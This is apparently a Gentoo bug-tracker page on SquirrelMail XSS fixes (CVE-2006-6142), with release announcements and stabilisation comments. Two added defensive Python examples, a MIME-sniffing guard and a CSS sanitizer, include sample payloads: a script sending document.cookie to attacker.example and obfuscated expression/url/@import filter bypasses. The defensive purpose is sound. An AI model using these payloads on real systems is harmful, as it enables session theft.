Bug 156949 - mail-client/squirrelmail 1.4.9a fixes XSS (CVE-2006-6142)
Status: RESOLVED FIXED
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities
Hardware: All
OS: Other
Importance: High minor
Assignee: Gentoo Security
URL: http://www.squirrelmail.org/security/...
Whiteboard: B4 [noglsa] DerCorny
Reported: 2006-12-02 15:13 UTC by Rajiv Aaron Manglani (RETIRED)
Modified: 2007-05-21 17:17 UTC
Description Rajiv Aaron Manglani (RETIRED) gentoo-dev 2006-12-02 15:13:27 UTC
From: kink@squirrelmail.org
Subject: [SM-ANNOUNCE] SquirrelMail 1.4.9 Released
Date: December 2, 2006 10:48:45 AM EST
To: squirrelmail-announce@lists.sourceforge.net
Cc: squirrelmail-plugins@lists.sourceforge.net, squirrelmail-users@lists.sourceforge.net, squirrelmail-devel@lists.sourceforge.net

Hello All,

The SquirrelMail Project Team is proud to announce the release of
SquirrelMail 1.4.7. This version is a maintenance release, addressing
the following problems since 1.4.6:
- Some security fixes (see below)
- Small enhancements
- A collection of bugfixes (see ChangeLog)

Security issues
===============

This release addresses security issues found since the release of 1.4.8:

Cross site scripting via malicious input to the mailto parameter of
webmail.php, the session and delete_draft parameters of compose.php, and
via a shortcoming in the magicHTML filter.

This is CVE-2006-6142. Thanks to Martijn Brinkers for his continued
research that uncovered these issues.

We've also changed SquirrelMail attachment handling to work around an
issue in Internet Explorer: the browser will attempt to guess the MIME
type of attachments based on content, not the MIME header we send.
Attachments could pretend to be a 'harmless' image/jpeg, while they were
in fact HTML that Internet Explorer would render.

Further details on SquirrelMail vulnerabilities can be found at the
following address:

  http://www.squirrelmail.org/security/

We strongly encourage any persons uncovering security issues to
contact the SquirrelMail team via security <at> squirrelmail.org.

Package md5sums
===============

b3dc6e3c5accb9b88bf6ebfd87336b96  squirrelmail-1.4.9.tar.bz2
5a3ecbda6d8378c68fa40b4ac5b2d487  squirrelmail-1.4.9.tar.gz
875848f25d481b59552d4e93aaacba4c  squirrelmail-1.4.9.zip


Download at:

  http://www.squirrelmail.org/download.php

Happy SquirrelMailing!

-- 
Thijs Kinkhorst
SquirrelMail Project Team
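The attachment problem described in the announcement is content sniffing: Internet Explorer decided what a download was by looking at its bytes, so a body that was really HTML could be served under a harmless image/jpeg label and still be rendered, with the webmail origin's cookies in scope. The following is an added example, not SquirrelMail's own code, of the kind of download-handler check that defends against it: every attachment is forced to a download disposition, and a body that would sniff as HTML but is declared as something else is downgraded to a generic binary type. The marker list and the 256-byte window are this example's assumptions about the sniffer, not a documented IE heuristic; the X-Content-Type-Options header did not exist in 2006 (it arrived with IE8) and is included as the control a practitioner would add today.

```python
import re

# Constructed approximation of the tokens a content sniffer looks for before
# deciding a body is HTML. The real IE heuristic is undocumented; this list and
# the window size below are assumptions made for this example.
HTML_MARKERS = (b"<html", b"<head", b"<body", b"<script", b"<iframe", b"<title", b"<!doctype")
SNIFF_WINDOW = 256  # assumption: only the leading bytes are inspected by the browser


def looks_like_html(data: bytes) -> bool:
    """True if the leading bytes of an attachment would plausibly be sniffed as HTML."""
    head = data[:SNIFF_WINDOW].lower()
    return any(marker in head for marker in HTML_MARKERS)


def attachment_headers(declared_type: str, filename: str, data: bytes) -> dict:
    """Response headers for serving one attachment for download.

    Policy (this example's, not SquirrelMail's):
      * always Content-Disposition: attachment, so nothing is rendered inline;
      * if the declared type is not HTML but the bytes look like HTML, refuse to
        label it with the declared type and serve application/octet-stream;
      * strip CR/LF and quotes from the filename so it cannot inject headers;
      * tell modern browsers not to second-guess the type at all.
    HTML attachments declared as text/html are out of scope here; they belong
    to the HTML-filtering path, not the raw download path.
    """
    content_type = declared_type.lower()
    if not content_type.startswith("text/html") and looks_like_html(data):
        content_type = "application/octet-stream"

    safe_name = re.sub(r"[^A-Za-z0-9._-]", "_", filename) or "attachment"
    return {
        "Content-Type": content_type,
        "Content-Disposition": f'attachment; filename="{safe_name}"',
        "X-Content-Type-Options": "nosniff",
    }


if __name__ == "__main__":
    # Constructed sample: an "image" whose body is an HTML document.
    fake_jpeg = b"<html><body><script>document.location='http://attacker.example/?'+document.cookie</script></body></html>"
    print(attachment_headers("image/jpeg", "holiday.jpg", fake_jpeg))
    print(attachment_headers("image/jpeg", "holiday.jpg", b"\xff\xd8\xff\xe0\x00\x10JFIF"))
```

The downgrade is deliberately one-way: a genuine JPEG keeps its declared type, while anything that could be mistaken for HTML loses the label that made it look safe. Note that a sniffer may also look past a valid image header, which is why the check runs over the whole window rather than only the first bytes.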
Comment 1 Stefan Cornelius (RETIRED) gentoo-dev 2006-12-03 03:51:35 UTC
thanks for filing this, eradicator please provide new packages blablaa (guess you already know that ;)
Comment 2 Rajiv Aaron Manglani (RETIRED) gentoo-dev 2006-12-03 18:09:34 UTC
From: marc@squirrelmail.org
Subject: [SM-ANNOUNCE] SquirrelMail 1.4.9a Released
Date: December 3, 2006 8:25:21 PM EST
To: 	  squirrelmail-announce@lists.sourceforge.net
Cc: 	  squirrelmail-devel@lists.sourceforge.net, squirrelmail-users@lists.sourceforge.net, squirrelmail-plugins@lists.sourceforge.net

Hello All,

The SquirrelMail Project Team is proud to announce the release of
SquirrelMail 1.4.9a. This version is a security release.

The day after we released SquirrelMail 1.4.9, new cross site scripting
issues were reported and immediately fixed. Therefore the decision to
release 1.4.9a so shortly after the 1.4.9 release.

1.4.9 and 1.4.9a are addressing the following problems since 1.4.8:
- Some security fixes (see below)
- Small enhancements
- A collection of bugfixes (see ChangeLog)

Security issues
===============
This release addresses security issues found since the release of 1.4.8:

Cross site scripting via malicious input to the mailto parameter of
webmail.php, the session and delete_draft parameters of compose.php, and
via a shortcoming in the magicHTML filter.

This is CVE-2006-6142. Thanks to Martijn Brinkers for his continued research
that uncovered these issues.

We've also changed SquirrelMail attachment handling to work around an issue
in Internet Explorer: the browser will attempt to guess the MIME type of
attachments based on content, not the MIME header we send. Attachments could
pretend to be a 'harmless' image/jpeg, while they were in fact HTML that
Internet Explorer would render.

After release 1.4.9 Martijn Brinkers again discovered new cross site
scripting issues in the magicHtml filter. The newly discovered security issues
have to do with the wide interpretation of the words expression and url by IE
browsers. As a second issue, Martijn Brinkers found that the @import statement in
stylesheets could be misused.

Further details on SquirrelMail vulnerabilities can be found at the
following address:

  http://www.squirrelmail.org/security/


Package md5sums
===============

3adf66bfe2e816ba8375cf811d8ef3f6 squirrelmail-1.4.9a.tar.bz2
5b19f8cc5badef91d1f2410df41564bc squirrelmail-1.4.9a.tar.gz
a9e108418b0a42763a1d29a267fa7168 squirrelmail-1.4.9a.zip


Download at:

  http://www.squirrelmail.org/download.php

Happy SquirrelMailing!

-- 
Marc Groot Koerkamp
SquirrelMail Project Team
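The 1.4.9a announcement above is about a filter that matched the literal words expression and url while Internet Explorer's CSS parser accepted those keywords with comments, backslash escapes and stray control bytes inside them, so `expr/**/ession(...)` or `u\rl(javascript:...)` slipped past the block-list yet still executed. The following is an added example, not SquirrelMail's magicHTML code, of the general fix: normalise a style string the way a lenient parser would read it, then apply the block-list to the normalised form. The construct names, regular expressions and sample inputs are constructed for this example; `url(` is treated as dangerous outright, which is the conservative choice for webmail where remote stylesheet and image fetches are not wanted anyway.

```python
import re

# Backslash escapes as CSS defines them: \ + 1..6 hex digits + optional single
# whitespace, or \ + any other character which stands for itself.
_CSS_ESCAPE = re.compile(r"\\(?:([0-9a-fA-F]{1,6})[ \t\r\n\f]?|(.))", re.S)
_CSS_COMMENT = re.compile(r"/\*.*?\*/", re.S)
# Control bytes that lenient parsers skipped inside identifiers (assumption for
# this example; NUL in particular was known to be ignored).
_CONTROL_CHARS = re.compile(r"[\x00-\x08\x0b\x0c\x0e-\x1f\x7f]")


def decode_css_escapes(text: str) -> str:
    """Resolve CSS escapes: '\\72 ' -> 'r', '\\r' -> 'r'."""
    def repl(m):
        if m.group(1) is not None:
            try:
                return chr(int(m.group(1), 16))
            except (ValueError, OverflowError):  # code point out of range
                return ""
        return m.group(2)
    return _CSS_ESCAPE.sub(repl, text)


def normalize_css(style: str) -> str:
    """The form of a style string that a lenient browser parser would act on."""
    s = _CSS_COMMENT.sub("", style)     # expr/**/ession  -> expression
    s = decode_css_escapes(s)           # exp\72 ession, exp\ression -> expression
    s = _CSS_COMMENT.sub("", s)         # comment delimiters produced by escapes
    s = _CONTROL_CHARS.sub("", s)       # expr<NUL>ession -> expression
    s = re.sub(r"\s+", " ", s)
    return s.lower()


# Block-list applied to the normalised string. Names are this example's own.
DANGEROUS = {
    "expression": re.compile(r"expression\s*\("),
    "url":        re.compile(r"url\s*\("),
    "import":     re.compile(r"@import"),
    "script-uri": re.compile(r"(?:javascript|vbscript)\s*:"),
    "behavior":   re.compile(r"behavior\s*:"),
}


def dangerous_constructs(style: str) -> list:
    """Names of every blocked construct present after normalisation."""
    normalized = normalize_css(style)
    return [name for name, pat in DANGEROUS.items() if pat.search(normalized)]


def sanitize_style(style: str) -> str:
    """Keep a style attribute value only if nothing on the block-list survives normalisation."""
    return "" if dangerous_constructs(style) else style


if __name__ == "__main__":
    # Constructed samples of the obfuscations a literal word match would miss.
    for sample in (
        "color: red; font-size: 12px",
        "width: expr/**/ession(alert(1))",
        r"width: exp\72 ession(alert(1))",
        r"background: u\rl(javascript:alert(1))",
        "@im/**/port 'http://evil.example/x.css'",
    ):
        print(repr(sample), "->", dangerous_constructs(sample))
```

The important property is the order of operations: comments are stripped before and after escape decoding, because an escape can itself produce a `/*` that would otherwise hide the keyword from the second pass. Matching the raw string first and normalising afterwards, which is what a simple word filter does, is exactly the gap the announcement describes.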
Comment 3 Andrej Kacian (RETIRED) gentoo-dev 2006-12-10 07:54:57 UTC
As Jeremy is still MIA, I took the liberty of bumping squirrelmail to 1.4.9a.

I have also marked it stable on x86, as I only tested it on a stable box, where I have a working squirrelmail installation.
Comment 4 Alexander Færøy 2006-12-26 16:13:48 UTC
Arches,

test and mark mail-client/squirrelmail-1.4.9a stable if possible please
Comment 5 Alexander Færøy 2006-12-26 16:14:31 UTC
x86 and sparc already done. Removing.
Comment 6 Tobias Scherbaum (RETIRED) gentoo-dev 2006-12-26 23:58:38 UTC
ppc stable
Comment 7 Bryan Østergaard (RETIRED) gentoo-dev 2006-12-28 14:14:07 UTC
Stable on Alpha.
Comment 8 Markus Rothe (RETIRED) gentoo-dev 2006-12-30 04:59:21 UTC
ppc64 stable
Comment 9 Steve Dibb (RETIRED) gentoo-dev 2007-01-23 10:00:49 UTC
amd64 stable
Comment 10 Raphael Marichez (Falco) (RETIRED) gentoo-dev 2007-02-10 19:17:44 UTC
I vote no
Comment 11 Raphael Marichez (Falco) (RETIRED) gentoo-dev 2007-02-12 22:36:02 UTC
I'm actually the only active member of the security team, so let's close this without GLSA. Feel free to reopen if you disagree.
Comment 12 Jeremy Huddleston (RETIRED) gentoo-dev 2007-05-21 17:17:51 UTC
This was marked as closed but was never fixed for ~arch.  1.5.1-r4 contains the fix.